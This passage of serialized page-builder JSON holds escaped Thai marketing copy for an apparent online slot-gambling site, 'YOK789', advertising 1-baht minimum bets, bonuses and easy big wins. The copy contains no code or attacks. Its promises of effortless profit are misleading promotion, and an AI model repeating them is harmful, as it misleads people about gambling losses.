\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e27\\u0e48\\u0e32\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e0a\\u0e31\\u0e14\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14<\\/span><\\/b><\\/p><ul><li><b><span style=\\\"color: #99cc00;\\\">\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49<\\/span> <\\/b><\\/li><\\/ul><p><b><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e07\\u0e1a\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e2d\\u0e22\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e01\\u0e23\\u0e30\\u0e40\\u0e1b\\u0e4b\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e21\\u0e35\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e2a\\u0e34\\u0e1a\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e27 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e14\\u0e14\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e1b\\u0e31\\u0e49\\u0e19\\u0e01\\u0e33\\u0e44\\u0e23\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e01\\u0e47\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e21\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e21\\u0e32\\u0e01\\u0e01\\u0e47\\u0e22\\u0e31\\u0e07\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1a\\u0e48\\u0e07\\u0e0a\\u0e19\\u0e0a\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e17\\u0e48\\u0e32\\u0e01\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e15\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e32\\u0e21\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/b><\\/p><ul><li><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e04\\u0e23\\u0e1a <\\/b><\\/span><\\/li><\\/ul><p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e19\\u0e27\\u0e44\\u0e27\\u0e49\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22 \\u0e27\\u0e31\\u0e12\\u0e19\\u0e18\\u0e23\\u0e23\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e49\\u0e33\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e16\\u0e39\\u0e01\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e19\\u0e49\\u0e19\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e25\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07 \\u0e08\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e0a\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e01\\u0e23\\u0e30\\u0e08\\u0e32\\u0e22\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e01\\u0e47\\u0e21\\u0e35\\u0e15\\u0e31\\u0e27\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e14\\u0e23\\u0e2d\\u0e1b \\u0e43\\u0e04\\u0e23\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e46 \\u0e01\\u0e47\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e41\\u0e19\\u0e27\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e25\\u0e31\\u0e07\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e27\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e19\\u0e48\\u0e32\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e2a\\u0e31\\u0e19\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-.webp\",\"id\":294,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1a\\u0e2d\\u0e01\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e2a\\u0e48\\u0e2d\\u0e07\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e0a\\u0e35\\u0e27\\u0e34\\u0e15 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e0a\\u0e47\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e04\\u0e38\\u0e49\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e15\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e33\\u0e19\\u0e27\\u0e13\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e01\\u0e41\\u0e0a\\u0e15\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e1a\\u0e2d\\u0e01\\u0e40\\u0e25\\u0e22\\u0e27\\u0e48\\u0e32\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e30\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e23\\u0e27\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e22<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 YOK789 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e23\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 \\u0e46 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e15\\u0e39\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e15\\u0e48\\u0e28\\u0e31\\u0e01\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e01\\u0e25\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e40\\u0e19\\u0e49\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07\\u0e01\\u0e47\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e44\\u0e25\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e16\\u0e39\\u0e01\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e23\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1f\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e41\\u0e15\\u0e48\\u0e43\\u0e0a\\u0e49\\u0e01\\u0e32\\u0e23\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e04\\u0e27\\u0e1a\\u0e04\\u0e39\\u0e48\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e25\\u0e47\\u0e01\\u0e41\\u0e15\\u0e48\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e43\\u0e19\\u0e42\\u0e25\\u0e01\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"YOK789 \\u0e22\\u0e01\\u0e15\\u0e31\\u0e27\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19 \\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 